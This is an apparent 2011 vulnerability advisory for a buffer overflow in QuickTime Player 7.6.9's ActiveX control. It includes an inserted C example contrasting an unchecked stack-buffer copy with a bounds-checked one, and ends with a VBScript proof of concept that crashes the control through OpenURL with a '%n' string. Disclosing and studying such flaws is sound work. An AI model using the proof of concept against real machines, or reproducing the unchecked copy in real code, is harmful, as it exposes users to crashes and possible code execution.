Quick Time Player 7.6.9 – ActiveX Control Buffer Overflow Vulnerability

Author(s): Ivan Sanchez & Hernan Hegykozi
Contact Us: security@evilcode.com.ar
Versions: QuickTimePlayer_7.6.9
Date: 06/09/2011
Product: QuickTimePlayer_7.6.9
Vendor Notified: 2 months ago (Apple Inc / bugreport.apple.com)
Problem ID: 9753778

We have discovered that the product "QuickTimePlayer_7.6.9" contains a serious ActiveX Control Buffer Overflow vulnerability: the application crashes when the control is driven with specially crafted input.

Vulnerability Details:

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of QuickTimePlayer.dll. User interaction is required to exploit this vulnerability, in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the QuickTimePlayer.dll component, which explicitly trusts a length embedded within a particular file in order to calculate the length of a buffer. The application then duplicates an arbitrarily sized string into a statically sized buffer located on the stack. This can lead to code execution under the context of the application.
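As an added illustration of the flaw class described above (this is not code from the advisory or from Apple), the following C compares the vulnerable pattern, a parser that trusts a length byte embedded in the file and copies that many bytes into a fixed-size stack buffer, with a hardened parser that bounds the declared length by both the record's real size and the destination buffer. The one-byte-length record layout, the 16-byte buffer and the sample records are constructed assumptions, not QuickTime's actual file format.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed record layout (assumption, not QuickTime's real format):
 *   byte 0     : declared payload length N (controlled by whoever wrote the file)
 *   bytes 1..N : payload
 */

#define NAME_BUF_LEN 16   /* statically sized destination, as in the advisory */

/* VULNERABLE pattern: the embedded length is used as the copy size with no
 * check against the real record size or the destination size. A record
 * declaring N >= NAME_BUF_LEN writes past `name` on the stack. Shown for
 * contrast only; it is never called by the checks below. */
size_t copy_name_unchecked(const uint8_t *rec, size_t rec_len)
{
    char name[NAME_BUF_LEN];
    size_t n = rec[0];
    (void)rec_len;                 /* ignored: this is the bug */
    memcpy(name, rec + 1, n);      /* stack buffer overflow when n is large */
    name[n] = '\0';
    return strlen(name);
}

/* HARDENED pattern: the declared length must not exceed the bytes actually
 * present in the record, and must leave room for the terminator in `out`.
 * Returns the copied length, or -1 if the record is malformed or oversized. */
int copy_name_checked(const uint8_t *rec, size_t rec_len,
                      char *out, size_t out_len)
{
    if (rec == NULL || out == NULL || rec_len < 1 || out_len == 0)
        return -1;
    size_t n = rec[0];
    if (n > rec_len - 1)           /* claims more bytes than the file holds */
        return -1;
    if (n >= out_len)              /* would not fit together with the NUL */
        return -1;
    memcpy(out, rec + 1, n);
    out[n] = '\0';
    return (int)n;
}

/* Parse a record the way a fixed control would: fixed stack buffer, checked
 * copy. Returns the accepted name length or -1 when the record is rejected. */
int parse_record(const uint8_t *rec, size_t rec_len)
{
    char name[NAME_BUF_LEN];
    return copy_name_checked(rec, sizeof name == 0 ? 0 : rec_len, name, sizeof name);
}

/* Constructed sample records (not taken from the advisory). */
static const uint8_t good_rec[]  = { 5, 'm', 'o', 'v', 'i', 'e' };
static const uint8_t lying_rec[] = { 200, 'a', 'b', 'c' };   /* declares more than present */
static const uint8_t long_rec[]  = { 40,
    'A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A',
    'A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A' };

int parse_good(void)  { return parse_record(good_rec,  sizeof good_rec);  }
int parse_lying(void) { return parse_record(lying_rec, sizeof lying_rec); }
int parse_long(void)  { return parse_record(long_rec,  sizeof long_rec);  }

int main(void)
{
    /* Expected: good: 5, lying: -1, long: -1 */
    printf("good: %d  lying: %d  long: %d\n",
           parse_good(), parse_lying(), parse_long());
    return 0;
}
```

The two rejections are the checks the advisory says are missing: a length that overruns the file itself, and a length that is consistent with the file but larger than the fixed stack buffer it is copied into. Either one alone is insufficient.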


POC:

1-Open QuickTime,

2-Run the following code:

crashapp.wsf

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:0F5B08E7-94EE-470B-A184-5CD4A7DF35A3' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\QuickTime\QuickTimePlayer.dll"
prototype  = "Sub OpenURL ( ByVal url As String )"
memberName = "OpenURL"
progid     = "QuickTimePlayerLib.QuickTimePlayer"
argCount   = 1
arg1="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
target.OpenURL arg1
</script>
</job>
</package>

3-The application will crash.
